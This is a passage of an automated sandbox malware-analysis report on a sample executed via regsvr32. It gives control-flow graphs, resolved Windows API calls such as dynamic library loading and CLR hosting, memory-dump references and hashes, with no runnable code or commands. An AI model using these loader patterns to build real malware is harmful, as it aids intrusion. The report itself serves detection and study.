4036->4044 4045 7ffd3493f3ec-7ffd3493f3fc 4036->4045 4046 7ffd3493f355 4037->4046 4047 7ffd3493f35b-7ffd3493f35e 4037->4047 4043 7ffd3493f6b9-7ffd3493f6c2 call 7ffd3496f690 4038->4043 4053 7ffd3493f5d5-7ffd3493f5e4 call 7ffd348efe90 4040->4053 4054 7ffd3493f5e9-7ffd3493f642 call 7ffd34939060 4040->4054 4048 7ffd3493f4c7-7ffd3493f4ca 4041->4048 4049 7ffd3493f55c-7ffd3493f576 4041->4049 4043->4014 4056 7ffd3493f437-7ffd3493f446 4044->4056 4055 7ffd3493f3fe-7ffd3493f41e 4045->4055 4045->4056 4046->4047 4047->4038 4057 7ffd3493f364-7ffd3493f379 4047->4057 4058 7ffd3493f4e0-7ffd3493f4e3 4048->4058 4059 7ffd3493f4cc-7ffd3493f4d2 4048->4059 4068 7ffd3493f578-7ffd3493f587 call 7ffd348efe90 4049->4068 4069 7ffd3493f58c-7ffd3493f593 4049->4069 4065 7ffd3493f7e4-7ffd3493f7f0 4050->4065 4060 7ffd3493f7a0-7ffd3493f7b3 SleepEx 4051->4060 4053->4054 4078 7ffd3493f647-7ffd3493f64a 4054->4078 4063 7ffd3493f420 4055->4063 4064 7ffd3493f448-7ffd3493f465 4055->4064 4056->4063 4056->4064 4057->4043 4067 7ffd3493f37f-7ffd3493f38f 4057->4067 4058->4049 4074 7ffd3493f4e5-7ffd3493f4eb 4058->4074 4073 7ffd3493f4ed-7ffd3493f4f7 4059->4073 4060->4060 4075 7ffd3493f7b5-7ffd3493f7cc 4060->4075 4063->4044 4064->4017 4076 7ffd3493f804-7ffd3493f810 4065->4076 4077 7ffd3493f7f2-7ffd3493f802 call 7ffd34947000 4065->4077 4079 7ffd3493f391-7ffd3493f39e 4067->4079 4080 7ffd3493f3aa 4067->4080 4068->4069 4071 7ffd3493f5a7-7ffd3493f5ab 4069->4071 4072 7ffd3493f595-7ffd3493f5a2 call 7ffd348efe90 4069->4072 4084 7ffd3493f5ad-7ffd3493f5b0 CloseHandle 4071->4084 4085 7ffd3493f5b5-7ffd3493f5cf 4071->4085 4072->4071 4073->3982 4081 7ffd3493f4fd-7ffd3493f511 call 7ffd348efe90 4073->4081 4074->4049 4074->4073 4075->4065 4086 7ffd3493f7ce-7ffd3493f7d0 4075->4086 4090 7ffd3493f814-7ffd3493f820 4076->4090 4077->4090 4088 7ffd3493f66d-7ffd3493f687 4078->4088 4089 7ffd3493f64c-7ffd3493f662 4078->4089 4082 7ffd3493f3ac-7ffd3493f3c5 call 7ffd3490c530 4079->4082 4080->4082 4081->3982 4100 7ffd3493f6a6-7ffd3493f6b5 4082->4100 4101 7ffd3493f3cb-7ffd3493f3d5 4082->4101 4084->4085 4086->4090 4088->4085 4091 7ffd3493f68d-7ffd3493f69f call 7ffd348efe90 4088->4091 4089->4072 4095 7ffd3493f668 4089->4095 4091->4085 4095->4071 4100->4043 4101->4029
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentPrng
                                                                              • String ID:
                                                                              • API String ID: 716580790-0
                                                                              • Opcode ID: 0df334ae3f1341972e445362f2916964484d83b33dbd9aa1e2784f31b7def40e
                                                                              • Instruction ID: bc6ec330fc3fb8291bb3f9e4169a6a44435c3c40e9b44282cc182def78a86829
                                                                              • Opcode Fuzzy Hash: 0df334ae3f1341972e445362f2916964484d83b33dbd9aa1e2784f31b7def40e
                                                                              • Instruction Fuzzy Hash: FF220422B04A828AEB648F25D8B03B92790FB46798F144239EF5E877DDDF3CD541A310
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: 8f3f8bf7fa46a44ee1e171b3fad80ba7b3f33142f7fc0cabe1a7f593173d6017
                                                                              • Instruction ID: b18683c557b8d6ccb3502ebd30b90c2e5fb52936671dcabd5b8c5633083d5afd
                                                                              • Opcode Fuzzy Hash: 8f3f8bf7fa46a44ee1e171b3fad80ba7b3f33142f7fc0cabe1a7f593173d6017
                                                                              • Instruction Fuzzy Hash: 60F27271A1895D8FEB98EF18C8A16B8BBE1EF58304F4401B9D45DF72CADE24E841CB51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 7403 7ffd348fa1b0-7ffd348fa1bd 7404 7ffd348fa216 7403->7404 7405 7ffd348fa1bf-7ffd348fa1cb 7403->7405 7407 7ffd348fa218-7ffd348fa224 7404->7407 7406 7ffd348fa1d8-7ffd348fa1fc BCryptGenRandom 7405->7406 7408 7ffd348fa1d0-7ffd348fa1d6 7406->7408 7409 7ffd348fa1fe-7ffd348fa20c SystemFunction036 7406->7409 7408->7404 7408->7406 7409->7408 7410 7ffd348fa20e-7ffd348fa214 7409->7410 7410->7407
                                                                              APIs
                                                                              • BCryptGenRandom.BCRYPT(?,?,?,00007FFD348F9CF5,?,?,?,00007FFD348E75E3), ref: 00007FFD348FA1F2
                                                                              • SystemFunction036.ADVAPI32(?,?,?,00007FFD348F9CF5,?,?,?,00007FFD348E75E3), ref: 00007FFD348FA205
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFunction036RandomSystem
                                                                              • String ID:
                                                                              • API String ID: 1232939966-0
                                                                              • Opcode ID: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
                                                                              • Instruction ID: 65d8aa66f8bd1c53f04c58e3a01a8d9f1d7b70b0aff3ba751c94dcb5592bb17f
                                                                              • Opcode Fuzzy Hash: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
                                                                              • Instruction Fuzzy Hash: 52F09053F0915905FE7516A63E945B580415F2ABF0D288335AE3AD7AD5AC2C6C863100
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 3afb46e7ee860a2a045ed4e282ea2a77fc2dba6c33cc5c8de209ced5545ebd2b
                                                                              • Instruction ID: c4f0025c4ea9077982e89f909824ad76052b1f1e1dab73fc791e70c9faa5eb28
                                                                              • Opcode Fuzzy Hash: 3afb46e7ee860a2a045ed4e282ea2a77fc2dba6c33cc5c8de209ced5545ebd2b
                                                                              • Instruction Fuzzy Hash: 6812573290D79E0FE3569B2498651B4BFE1EF82220F0501FBD49DDB1E3DA286806D776
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: sK_^
                                                                              • API String ID: 0-2515636007
                                                                              • Opcode ID: 43a2a401d5b9a86f3f839bd9974b9f4a6561ff53ad369d37bc01bb4da774ce21
                                                                              • Instruction ID: c9405ee97f8f15a14919fc20f87434a104da80768ab9c79c8b5f2112f6e4d221
                                                                              • Opcode Fuzzy Hash: 43a2a401d5b9a86f3f839bd9974b9f4a6561ff53ad369d37bc01bb4da774ce21
                                                                              • Instruction Fuzzy Hash: 29F18E62A1CA6A4FE745BB2CE4E55F8BBD1EF54324B04017BD00CE71C7CE18A486C7A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 04613ff6111592d946c4591884d27e5ce86a6aed31232b156e869f51da31a55b
                                                                              • Instruction ID: a839bc1a283cbc3a974edcdde9451853393c0ebe129d2d35d99f6eca934f6867
                                                                              • Opcode Fuzzy Hash: 04613ff6111592d946c4591884d27e5ce86a6aed31232b156e869f51da31a55b
                                                                              • Instruction Fuzzy Hash: 24622731A0C91D4FE768DA1CC896678B7D1EF99310F1402B9D46ED32DADE24AC43C7A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0135e244934d2e92c307bdb903ba578ea7ed458f639cd6d4ce0ccd5b6280472
                                                                              • Instruction ID: fc7a469490e68dc63a97f5b098287a4f171a2430439b4add5a06122f43ff1663
                                                                              • Opcode Fuzzy Hash: a0135e244934d2e92c307bdb903ba578ea7ed458f639cd6d4ce0ccd5b6280472
                                                                              • Instruction Fuzzy Hash: BC124130B1892D4FDB84FB18C4E5AB9B7E1FB98314B504179D41EE32DADE28E841C7A1
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$memcpymemset
                                                                              • String ID: :$called `Result::unwrap()` on an `Err` value
                                                                              • API String ID: 3399779480-2450422549
                                                                              • Opcode ID: 2652290765158f07b095b2e49c49a60cec60f8bf4307c97cfe14cf2b329653a4
                                                                              • Instruction ID: 996ba971ebd50a4943896cf99c184efdef6f08b63242ad6eb29740ee3b7d0798
                                                                              • Opcode Fuzzy Hash: 2652290765158f07b095b2e49c49a60cec60f8bf4307c97cfe14cf2b329653a4
                                                                              • Instruction Fuzzy Hash: 28234122A0DBC691FA758B14F4947EAB360FB96344F449229DBCC42699DF7CE2C4DB40

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2245 7ffd348e7f00-7ffd348e7f1d call 7ffd34992a4c 2248 7ffd348e83f4-7ffd348e8408 2245->2248 2249 7ffd348e7f23-7ffd348e7f38 call 7ffd349929fc 2245->2249 2249->2248 2252 7ffd348e7f3e-7ffd348e7f48 GetModuleHandleA 2249->2252 2252->2248 2253 7ffd348e7f4e-7ffd348e7f55 2252->2253 2253->2248 2254 7ffd348e7f5b-7ffd348e7ff7 call 7ffd348f65a0 call 7ffd348e8610 call 7ffd348e7180 call 7ffd34992bf4 call 7ffd348e7180 GetProcAddress 2253->2254 2265 7ffd348e7ff9-7ffd348e8002 call 7ffd348efe90 2254->2265 2266 7ffd348e8007-7ffd348e800f 2254->2266 2265->2266 2268 7ffd348e8011-7ffd348e801a call 7ffd348efe90 2266->2268 2269 7ffd348e801f-7ffd348e809a call 7ffd348e7180 GetModuleHandleA call 7ffd348e7180 GetProcAddress 2266->2269 2268->2269 2275 7ffd348e809c-7ffd348e80a5 call 7ffd348efe90 2269->2275 2276 7ffd348e80aa-7ffd348e80b2 2269->2276 2275->2276 2278 7ffd348e80b4-7ffd348e80bd call 7ffd348efe90 2276->2278 2279 7ffd348e80c2-7ffd348e813b call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 2276->2279 2278->2279 2285 7ffd348e814b-7ffd348e8153 2279->2285 2286 7ffd348e813d-7ffd348e8146 call 7ffd348efe90 2279->2286 2288 7ffd348e8155-7ffd348e815e call 7ffd348efe90 2285->2288 2289 7ffd348e8163-7ffd348e81dc call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 2285->2289 2286->2285 2288->2289 2295 7ffd348e81ec-7ffd348e81f4 2289->2295 2296 7ffd348e81de-7ffd348e81e7 call 7ffd348efe90 2289->2296 2298 7ffd348e81f6-7ffd348e81ff call 7ffd348efe90 2295->2298 2299 7ffd348e8204-7ffd348e827d call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 2295->2299 2296->2295 2298->2299 2305 7ffd348e827f-7ffd348e8288 call 7ffd348efe90 2299->2305 2306 7ffd348e828d-7ffd348e8295 2299->2306 2305->2306 2307 7ffd348e8297-7ffd348e82a0 call 7ffd348efe90 2306->2307 2308 7ffd348e82a5-7ffd348e831e call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 2306->2308 2307->2308 2315 7ffd348e8320-7ffd348e8329 call 7ffd348efe90 2308->2315 2316 7ffd348e832e-7ffd348e8336 2308->2316 2315->2316 2318 7ffd348e8338-7ffd348e8341 call 7ffd348efe90 2316->2318 2319 7ffd348e8346-7ffd348e8384 2316->2319 2318->2319 2321 7ffd348e83b8-7ffd348e83c0 2319->2321 2322 7ffd348e8386-7ffd348e8389 2319->2322 2321->2248 2323 7ffd348e83c2-7ffd348e83c6 2321->2323 2322->2321 2324 7ffd348e838b-7ffd348e838e 2322->2324 2323->2248 2326 7ffd348e83c8-7ffd348e83d8 call 7ffd348efe90 2323->2326 2324->2321 2325 7ffd348e8390-7ffd348e83a5 CreateEventW 2324->2325 2325->2321 2327 7ffd348e83a7-7ffd348e83b6 WaitForSingleObject 2325->2327 2326->2248 2327->2321 2329 7ffd348e83da-7ffd348e83ef call 7ffd34992c8c call 7ffd34992a7c call 7ffd348e5430 2327->2329 2329->2248
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$HandleModule$CreateEventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 229642238-0
                                                                              • Opcode ID: 6885328148c1d0160a3d00ae2f864a6d679455b6c5dbdd36056da30315b74ffd
                                                                              • Instruction ID: ae1e5aff873be6bef264347a409fe0d5f4ce057c2b1bc2d82ff5a1390bcf0a55
                                                                              • Opcode Fuzzy Hash: 6885328148c1d0160a3d00ae2f864a6d679455b6c5dbdd36056da30315b74ffd
                                                                              • Instruction Fuzzy Hash: 1EC19422B0864740FE589B15E4A07BB6361BF877C4F484539EF4C8B69ADF3EE184A750

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4102 2fe5a20-2fe5adf 4103 2fe5ae6-2fe5aeb 4102->4103 4104 2fe5b72-2fe5b77 4103->4104 4105 2fe5af1-2fe5af6 4103->4105 4106 2fe5b7d-2fe5b82 4104->4106 4107 2fe5c0b-2fe5c10 4104->4107 4108 2fe5bcf-2fe5bd4 4105->4108 4109 2fe5afc-2fe5b01 4105->4109 4110 2fe5b88-2fe5b8d 4106->4110 4111 2fe5cc0-2fe5cc5 4106->4111 4116 2fe5c16-2fe5c1b 4107->4116 4117 2fe5d23-2fe5d28 4107->4117 4112 2fe5bda-2fe5bdf 4108->4112 4113 2fe5ceb-2fe5cf0 4108->4113 4114 2fe5c4c-2fe5c51 4109->4114 4115 2fe5b07-2fe5b0c 4109->4115 4120 2fe5b93-2fe5b98 4110->4120 4121 2fe5d80-2fe5d85 4110->4121 4130 2fe5e3d-2fe5e42 4111->4130 4131 2fe5ccb-2fe5cd0 4111->4131 4126 2fe5daa-2fe5daf 4112->4126 4127 2fe5be5-2fe5bea 4112->4127 4118 2fe5e7c-2fe5e81 4113->4118 4119 2fe5cf6-2fe5cfb 4113->4119 4122 2fe5e09-2fe5e0e 4114->4122 4123 2fe5c57-2fe5c5c 4114->4123 4128 2fe5d58-2fe5d5d 4115->4128 4129 2fe5b12-2fe5b17 4115->4129 4132 2fe5dd9-2fe5dde 4116->4132 4133 2fe5c21-2fe5c26 4116->4133 4124 2fe5d2e-2fe5d33 4117->4124 4125 2fe5eab-2fe5eb0 4117->4125 4146 2fe60eb-2fe6102 4118->4146 4147 2fe5e87-2fe5e8c 4118->4147 4152 2fe5eef-2fe5ef4 4119->4152 4153 2fe5d01-2fe5d06 4119->4153 4154 2fe5b9e-2fe5ba3 4120->4154 4155 2fe5ef9-2fe5f24 4120->4155 4162 2fe5d8b-2fe5d90 4121->4162 4163 2fe6043-2fe604a 4121->4163 4138 2fe5e14-2fe5e19 4122->4138 4139 2fe60c1-2fe60c6 4122->4139 4140 2fe5c62-2fe5c67 4123->4140 4141 2fe5fa3-2fe5fdf SafeArrayCreate 4123->4141 4156 2fe5d39-2fe5d3e 4124->4156 4157 2fe6005-2fe600d 4124->4157 4150 2fe5eb6-2fe5ebb 4125->4150 4151 2fe6107-2fe6117 SafeArrayDestroy 4125->4151 4164 2fe604f-2fe60a2 call 2fe713a 4126->4164 4165 2fe5db5-2fe5dba 4126->4165 4160 2fe5f3d-2fe5f52 4127->4160 4161 2fe5bf0-2fe5bf5 4127->4161 4158 2fe5d63-2fe5d68 4128->4158 4159 2fe6020-2fe6032 4128->4159 4144 2fe5b1d-2fe5b22 4129->4144 4145 2fe5ed7-2fe5ede 4129->4145 4142 2fe60cb-2fe60d0 4130->4142 4143 2fe5e48-2fe5e4d 4130->4143 4148 2fe5cd6-2fe5cdb 4131->4148 4149 2fe5fe4-2fe6000 4131->4149 4136 2fe60a7-2fe60bc 4132->4136 4137 2fe5de4-2fe5de9 4132->4137 4134 2fe5c2c-2fe5c31 4133->4134 4135 2fe5f82-2fe5f87 4133->4135 4177 2fe5f8c-2fe5f9e 4134->4177 4178 2fe5c37-2fe5c3c 4134->4178 4135->4103 4136->4103 4137->4103 4166 2fe5def-2fe5e04 4137->4166 4138->4103 4167 2fe5e1f-2fe5e38 4138->4167 4139->4103 4179 2fe611c-2fe6121 4140->4179 4180 2fe5c6d-2fe5ca3 call 2fe713a 4140->4180 4141->4103 4199 2fe60d5-2fe60e6 4142->4199 4143->4103 4168 2fe5e53-2fe5e77 4143->4168 4169 2fe5b28-2fe5b2d 4144->4169 4170 2fe5ee3-2fe5ee9 4144->4170 4145->4103 4146->4103 4147->4103 4171 2fe5e92-2fe5ea6 4147->4171 4148->4103 4182 2fe5ce1-2fe5ce6 4148->4182 4149->4103 4150->4103 4172 2fe5ec1-2fe5ec7 4150->4172 4151->4103 4152->4103 4153->4103 4183 2fe5d0c-2fe5d1e 4153->4183 4173 2fe5f29-2fe5f38 4154->4173 4174 2fe5ba9-2fe5bae 4154->4174 4155->4103 4156->4103 4184 2fe5d44-2fe5d53 4156->4184 4195 2fe6014-2fe601b 4157->4195 4158->4103 4185 2fe5d6e-2fe5d7b 4158->4185 4196 2fe6037-2fe603e 4159->4196 4160->4103 4175 2fe5bfb-2fe5c00 4161->4175 4176 2fe5f57-2fe5f7d CLRCreateInstance 4161->4176 4162->4103 4186 2fe5d96-2fe5da5 4162->4186 4163->4103 4164->4103 4165->4103 4187 2fe5dc0-2fe5dd4 4165->4187 4166->4103 4167->4103 4168->4103 4169->4103 4188 2fe5b2f-2fe5b43 4169->4188 4170->4152 4171->4103 4189 2fe5ecd-2fe5ed2 4172->4189 4173->4103 4174->4103 4190 2fe5bb4-2fe5bca 4174->4190 4175->4189 4192 2fe5c06 4175->4192 4176->4103 4177->4103 4178->4103 4194 2fe5c42-2fe5c47 4178->4194 4179->4103 4200 2fe6127-2fe613e 4179->4200 4205 2fe5caa-2fe5cbb 4180->4205 4182->4103 4183->4103 4184->4103 4185->4103 4186->4103 4187->4103 4203 2fe5b50-2fe5b6d 4188->4203 4189->4103 4190->4103 4192->4103 4194->4103 4195->4103 4196->4103 4199->4103 4203->4103 4205->4103
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2136151078.0000000002F90000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_2f90000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ArrayCreateSafe$DestroyInstance
                                                                              • String ID: '6}$'6}
                                                                              • API String ID: 3360715445-1339616389
                                                                              • Opcode ID: 74cb407b86e009e2de3434ab0c58eb3fafdd6186553028191188630ac4eed7ef
                                                                              • Instruction ID: ad0dc235883c3830452bcd1cc6b5075317c37f44f95674e0f86cb2c3bf341b73
                                                                              • Opcode Fuzzy Hash: 74cb407b86e009e2de3434ab0c58eb3fafdd6186553028191188630ac4eed7ef
                                                                              • Instruction Fuzzy Hash: F1F1B33170C6588FCF69EA1C98C876A77E1FB98799F94091AE64BC7250DF20D8858B42

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4208 7ffd3493f930-7ffd3493f968 call 7ffd3493fbd0 4211 7ffd3493f977-7ffd3493f9aa call 7ffd3493fbd0 4208->4211 4212 7ffd3493f96a-7ffd3493f972 CloseHandle 4208->4212 4216 7ffd3493f9b0-7ffd3493f9e8 4211->4216 4217 7ffd3493fb71-7ffd3493fb75 call 7ffd348fdac0 4211->4217 4213 7ffd3493fb7a-7ffd3493fb8c 4212->4213 4219 7ffd3493f9f0-7ffd3493fa09 call 7ffd34992d24 4216->4219 4217->4213 4222 7ffd3493fa50-7ffd3493fa57 4219->4222 4223 7ffd3493fa0b-7ffd3493fa0d 4219->4223 4224 7ffd3493fa5d-7ffd3493fa60 4222->4224 4225 7ffd3493fb25-7ffd3493fb2b call 7ffd3493fcb0 4222->4225 4226 7ffd3493fa13-7ffd3493fa1a 4223->4226 4227 7ffd3493fb58-7ffd3493fb5d GetLastError 4223->4227 4231 7ffd3493fa62-7ffd3493fa66 4224->4231 4232 7ffd3493fa6b-7ffd3493fa8a GetOverlappedResult 4224->4232 4240 7ffd3493fb30-7ffd3493fb34 4225->4240 4228 7ffd3493fa20-7ffd3493fa23 4226->4228 4229 7ffd3493faae-7ffd3493fab4 call 7ffd3493fcb0 4226->4229 4230 7ffd3493fb60-7ffd3493fb64 4227->4230 4234 7ffd3493fa91 4228->4234 4235 7ffd3493fa25-7ffd3493fa44 GetOverlappedResult 4228->4235 4251 7ffd3493fab9-7ffd3493fabd 4229->4251 4236 7ffd3493fb68-7ffd3493fb6c call 7ffd348fdac0 4230->4236 4237 7ffd3493fb10-7ffd3493fb23 4231->4237 4238 7ffd3493fa8c-7ffd3493fa8f 4232->4238 4239 7ffd3493fae9-7ffd3493faf1 GetLastError 4232->4239 4248 7ffd3493fa95-7ffd3493faa8 4234->4248 4242 7ffd3493facf-7ffd3493fad7 GetLastError 4235->4242 4243 7ffd3493fa4a-7ffd3493fa4d 4235->4243 4236->4217 4237->4225 4247 7ffd3493fb4b-7ffd3493fb56 call 7ffd3493fdc0 4237->4247 4238->4237 4244 7ffd3493faf3-7ffd3493faff 4239->4244 4245 7ffd3493fb07-7ffd3493fb09 4239->4245 4249 7ffd3493fb42-7ffd3493fb46 4240->4249 4250 7ffd3493fb36-7ffd3493fb3a 4240->4250 4252 7ffd3493fb03-7ffd3493fb05 4242->4252 4253 7ffd3493fad9-7ffd3493fae5 4242->4253 4243->4248 4244->4237 4255 7ffd3493fb01 4244->4255 4245->4237 4247->4236 4248->4229 4256 7ffd3493fb48 4248->4256 4249->4236 4250->4219 4257 7ffd3493fb40 4250->4257 4251->4249 4258 7ffd3493fac3-7ffd3493fac7 4251->4258 4252->4248 4253->4248 4259 7ffd3493fae7 4253->4259 4255->4230 4256->4247 4257->4247 4258->4219 4261 7ffd3493facd 4258->4261 4259->4230 4261->4256
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
